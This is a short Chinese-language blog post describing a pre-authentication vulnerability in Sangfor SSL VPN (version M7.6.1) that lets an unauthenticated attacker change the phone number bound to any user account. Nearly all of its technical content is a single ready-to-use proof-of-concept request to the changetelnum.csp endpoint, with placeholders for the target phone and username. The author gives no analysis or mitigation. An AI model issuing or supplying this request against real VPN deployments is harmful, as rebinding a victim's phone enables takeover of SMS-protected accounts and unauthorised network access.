Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全a minute read (About 119 words)0 visits深信服 SSL VPN - Pre Auth 修改绑定手机漏洞起因: 漏洞分析老版本(M7.6.1)代码放上,看不懂的直接看 POC 吧;新版本的没绕成功还在审,所以不确定是不是这个 POChttps://<path>/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 演示 深信服 SSL VPN - Pre Auth 修改绑定手机http://www.ol4three.com/2020/09/17/WEB/Exploit/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D-SSL-VPN-Pre-Auth-%E4%BF%AE%E6%94%B9%E7%BB%91%E5%AE%9A%E6%89%8B%E6%9C%BA/Authorol4threePosted on2020-09-17Updated on2021-03-03Licensed under sangfor, VPN